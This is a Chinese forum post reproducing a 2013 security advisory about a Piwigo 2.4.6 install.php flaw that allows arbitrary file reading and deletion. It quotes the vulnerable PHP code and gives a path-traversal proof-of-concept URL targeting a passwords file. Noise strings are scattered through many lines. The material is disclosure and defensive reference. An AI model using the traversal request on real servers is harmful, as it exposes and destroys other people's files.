找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2242|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
0 k; h5 h2 @) \6 Q8 O) C/ g; c8 M: q% X; G5 v
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。* a9 h+ s2 c0 ?% j9 ^% D. }
====================================================================0 O; v+ n3 v" P; ^  {
/install.php:0 d) Z/ Y/ |8 ~- ?5 h  ^  D
-------------
" t# }8 w% n, D% N' Y+ I113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))3 N0 l: ?' G( a( y
114: {
2 q( r2 ?0 X4 {1 _8 o- s2 @2 c115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
; `+ Z: }: N2 E- c& }  R2 E* X116:   header('Cache-Control: no-cache, must-revalidate');
/ L: S( h) t9 k* |& |117:   header('Pragma: no-cache');7 H' [/ O( H) N
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
$ r$ k/ y8 _- p$ s! `  t119:   header('Content-Transfer-Encoding: binary');
  G" H1 L) o2 Z  N120:   header('Content-Length: '.filesize($filename));
# p: r4 k/ C7 t$ N% _' }6 \/ I) _121:   echo file_get_contents($filename);
4 F$ D8 o$ `/ V' ~% ]* a5 q$ O9 _122:   unlink($filename);
# Y% X/ b# q/ B: O123:   exit();
$ N$ J5 @. `+ a, A, `124: }
7 X2 s  \" `4 P; e2 @====================================================================
6 x" B6 ~7 @5 o/ E/ b: X4 C 1 l8 q3 B4 `3 y9 @, g
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
; D& D3 v5 }7 R* n  M- _           Apache 2.4.2 (Win32)
- |. k7 _; [; ]% l& h* C) f+ e0 P           PHP 5.4.4* D4 Y! l4 H& [4 U
           MySQL 5.5.25a9 @2 a, y, R2 V" p$ |
9 }* D  u  \8 {9 S: i
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
. M. y) n8 Q' U  H/ A0 q0 Z5 t; G                            @zeroscience: H: k' @6 Y- A# [2 c* z

: W) [5 B. Y( }5 @/ v% xAdvisory ID: ZSL-2013-5127( S! E8 U5 s/ m- @. i  J
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php# F* G9 r0 o  S6 X
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
% i6 \0 H/ ^  g% Z0 b' \
4 u, M5 w: O+ e& p5 Y& B; ~2 @15.02.2013
* G0 d. d* d7 C' ?. h8 v
2 y' l) I5 P5 |--1 `( r5 z/ g( h3 j( ]0 A/ k
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
3 }: u1 p8 l/ ^& t0 k8 ~* }
/ P* _) G! {" Z. I% r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表